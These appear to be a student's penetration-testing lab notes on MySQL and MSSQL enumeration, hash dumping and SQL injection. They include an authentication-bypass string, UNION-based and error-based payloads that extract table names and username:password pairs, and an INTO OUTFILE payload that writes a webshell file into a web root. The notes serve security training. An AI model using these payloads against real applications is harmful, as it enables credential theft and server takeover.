Class Notes

MySQL Interaction and Enumeration

mysql -u root -p'root' -h 192.168.50.16 -P 3306 
 
select version();                   ##show MySQL server version 
select system_user();               ##show the MySQL account (user@host) the current session is authenticated as 
show databases;                     ##list all databases visible to this account 
show tables from mysql;             ##show all tables in the mysql system database 
show columns from mysql.user;       ##show all columns of the mysql.user table 
SELECT user, authentication_string FROM mysql.user WHERE user = 'offsec'; ##Dump the stored password hash (not cleartext) of the 'offsec' user 

MSSQL Interaction And Enumeration

impacket-mssqlclient Administrator:<password>@<target-host> -windows-auth 
 
-- show version 
SELECT @@version; 
 
-- List all databases 
select name from sys.databases; 
 
-- List non-default (user-created) databases 
select name from sys.Databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb'); 
 
-- List all the tables in the 'accounts' database 
USE accounts;                       -- Switch to the 'accounts' database 
SELECT table_name FROM INFORMATION_SCHEMA.TABLES;            -- list all tables 
 
-- List the columns of a table (replace 'table_name' with the target table, e.g. users) 
Select column_name from information_schema.columns where table_name='table_name'; 
 
-- Dump all rows from the users table 
select * from users; 
-- Dump only the row(s) matching a specific user 
select * from users where name='offsec'; 

username: $user password: $pass

admin:admin admin' OR 1=1-- //

order by 7

Select username, password from users where username='offsec' union select username, password from users--' AND password='admin';

1=2 OR 1=1 -> True; 1=2 OR 1=3 -> False; 1=2 AND 1=1 -> False

-- // */

admin' OR 1=1 in (SELECT user())-- // admin' OR 1=1 in (SELECT database())-- // admin' OR 1=1 in (SELECT table_name from information_schema.tables where table_schema='offsec')-- //

admin' OR 1=1 in (SELECT column_name from information_schema.columns where table_schema='offsec' AND table_name='users')-- //

admin' OR 1=1 in (SELECT group_concat(username, ":", password) from users)-- //

### Union

' order by 1-- // ' union select 1,2,3,4,5-- // ' union select 1,2,3,4,5-- // ' union select 1,"abc","abc","abc","abc"-- // ' union select 1,version(),database(),user(),"abc"-- // ' union select 1,table_name,database(),user(),"abc" from information_schema.tables where table_schema='offsec'-- //

' union select 1,column_name,database(),user(),"abc" from information_schema.columns where table_schema='offsec' AND table_name='users'-- //

' union select 1,username,password,user(),"abc" from users-- //

' union select "", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
